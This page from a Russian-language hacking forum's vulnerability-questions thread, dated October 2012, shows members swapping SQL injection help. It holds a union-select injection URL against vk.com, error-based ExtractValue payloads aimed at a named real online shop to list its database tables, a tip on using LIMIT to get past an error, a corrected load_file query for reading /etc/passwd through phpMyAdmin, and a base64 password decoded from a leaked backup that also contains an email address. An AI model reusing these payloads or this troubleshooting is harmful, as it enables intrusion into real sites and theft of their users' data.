HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2151 из 2438 « Первая < 11511651205121012141 2147 2148 2149 2150 2151 2152 2153 2154 2155 216122012251 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #21501  
Старый 20.10.2012, 17:17
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию
Цитата:
Сообщение от WendM  
WendM said:
А что делает функция ExtractValue () ?
http://dev.mysql.com/doc/refman/5.1/en/xml-functions.html#function_extractvalue

подобными вопросами в гугл, не флудим в теме
 
Ответить с цитированием

  #21502  
Старый 20.10.2012, 17:19
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию
http://vk.com/id1'+union+select+1,2,3+--+

Подскажите как вывести все пароли? Что я делаю не так?
 
Ответить с цитированием

  #21503  
Старый 20.10.2012, 18:28
Aplik
Guest
Сообщений: n/a
Провел на форуме:
2557

Репутация: 0
По умолчанию
В sql бекапе нашел следующую запись

('3','dsamir','dGVzdDEyMzQ=','miroslav@forge.com.u a','M','V','1',NULL,'3','2010-06-08 00:44:28','3','0','1','1','')

dGVzdDEyMzQ= я так понимаю это пароль, но чем он зашифрован?

Я только начинаю курить..
 
Ответить с цитированием

  #21504  
Старый 20.10.2012, 18:29
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию
Цитата:
Сообщение от Aplik  
Aplik said:
В sql бекапе нашел следующую запись
('3','dsamir','dGVzdDEyMzQ=','miroslav@forge.com.u a','M','V','1',NULL,'3','2010-06-08 00:44:28','3','0','1','1','')
dGVzdDEyMzQ= я так понимаю это пароль, но чем он зашифрован?
Я только начинаю курить..
Кодировка base64
 
Ответить с цитированием

  #21505  
Старый 20.10.2012, 18:41
Aplik
Guest
Сообщений: n/a
Провел на форуме:
2557

Репутация: 0
По умолчанию
Цитата:
Сообщение от Konqi  
Konqi said:
Кодировка base64
спасибо

жалко только пароль не подходит
 
Ответить с цитированием

  #21506  
Старый 20.10.2012, 23:09
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию
такой вопросец, получил доступ в phpmyadmin питался скачать файл etc/passwd, не выводит, пробую записать в таблицу, так

Цитата:
Сообщение от None  
insert into ib4.a values ('(SELECT load_file("/etc/passwd")')
чет вместо содержимого etc/passwd пишет его как строчку. как исправить?
 
Ответить с цитированием

  #21507  
Старый 20.10.2012, 23:16
VY_CMa
Guest
Сообщений: n/a
Провел на форуме:
193811

Репутация: 724
По умолчанию
Цитата:
Сообщение от qaz  
qaz said:
такой вопросец, получил доступ в phpmyadmin питался скачать файл etc/passwd, не выводит, пробую записать в таблицу, так
чет вместо содержимого etc/passwd пишет его как строчку. как исправить?
Пробовал просто вывести?

Цитата:
Сообщение от None  
SELECT load_file("/etc/passwd")
С кавычками играл?
 
Ответить с цитированием

  #21508  
Старый 20.10.2012, 23:17
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию
Цитата:
Сообщение от qaz  
qaz said:
такой вопросец, получил доступ в phpmyadmin питался скачать файл etc/passwd, не выводит, пробую записать в таблицу, так
чет вместо содержимого etc/passwd пишет его как строчку. как исправить?
епрст! ну сколько можно. когда наконец откроете гребанный учебник по MySQL?

все что внутри кавычек - называется строкой

вы пишите текст, потом удивляетесь

insert into tbl (`wtf`) values ((select load_file('/etc/passwd')))
 
Ответить с цитированием

  #21509  
Старый 21.10.2012, 08:05
WendM
Guest
Сообщений: n/a
Провел на форуме:
11466

Репутация: 3
По умолчанию
Цитата:
Сообщение от Konqi  
Konqi said:
http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3a,version())))='1. html
Спасибо еще раз. Но дольше раскрутить не могу.

Пробовал так _http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAM E)from(INFORMATION_SCHEMA.TABLES))))='1.html

Но выдает ошибку 406. Что можно сделать?
 
Ответить с цитированием

  #21510  
Старый 21.10.2012, 09:27
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию
Цитата:
Сообщение от WendM  
WendM said:
Спасибо еще раз. Но дольше раскрутить не могу.
Пробовал так _http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAM E)from(INFORMATION_SCHEMA.TABLES))))='1.html
Но выдает ошибку 406. Что можно сделать?
лимит использовать
 
Ответить с цитированием
Ответ
Страница 2151 из 2438 « Первая < 11511651205121012141 2147 2148 2149 2150 2151 2152 2153 2154 2155 216122012251 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ